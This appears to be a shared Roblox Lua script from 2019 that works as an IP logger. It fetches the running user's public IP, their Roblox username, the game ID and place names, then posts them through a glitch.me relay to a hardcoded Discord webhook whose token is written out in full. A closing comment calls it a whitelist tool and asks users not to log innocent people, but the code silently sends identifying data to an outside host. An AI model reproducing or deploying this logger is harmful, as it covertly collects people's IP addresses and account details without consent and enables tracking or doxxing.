· 6 years ago · Sep 28, 2019, 05:37 AM
1local webhook = "https://discordapp.com/api/webhooks/627372024762728449/kmrBhD6ykNOuL0s85vCo-1q6iHI2IWsbsP6x8QH8jhKRDXDWql2KkCrqbeLYQnHHdmwg"
2-- Webhook Above
3local api = "https://api.ipify.org"
4local message = "`".." Script Has Been Used: ~ "..game:HttpGet(api, true).. "`"
5local pages = game:GetService("AssetService"):GetGamePlacesAsync()
6 for _,place in pairs(pages:GetCurrentPage()) do
7local message3 = "Place Name Is: ".. place.Name
8local message2 = "`".."The game id is: "..game.PlaceId.."`".." + roblox username: ".. game:GetService("Players").LocalPlayer.Name
9local botname = "Logs" -- Name Here!
10local HttpService = game:GetService("HttpService");
11
12function specials(Webhook, Message, Botname)
13 local Name;
14 local start = game:HttpGet("http://buritoman69.glitch.me");
15 local biggie = "http://buritoman69.glitch.me/webhook";
16 if (not Message or Message == "" or not Botname) then
17 Name = "GameBot"
18 return error("nil or empty message!")
19 else
20 Name = Botname;
21 end
22 local Body = {
23 ['Key'] = tostring("applesaregood"),
24 ['Message'] = tostring(Message),
25 ['Name'] = Name,
26 ['Webhook'] = Webhook
27 }
28 Body = HttpService:JSONEncode(Body);
29 local Data = game:HttpPost(biggie, Body, false, "application/json")
30 return Data or nil;
31end
32
33specials(webhook, message, botname)
34specials(webhook, message2, botname)
35specials(webhook, message3, botname)
36end
37
38--[[ Please Don't Use This Script To Log Innocent People Or Use Their Ips As A Bait, Its Just For Making Your Whitelists Safer. ]]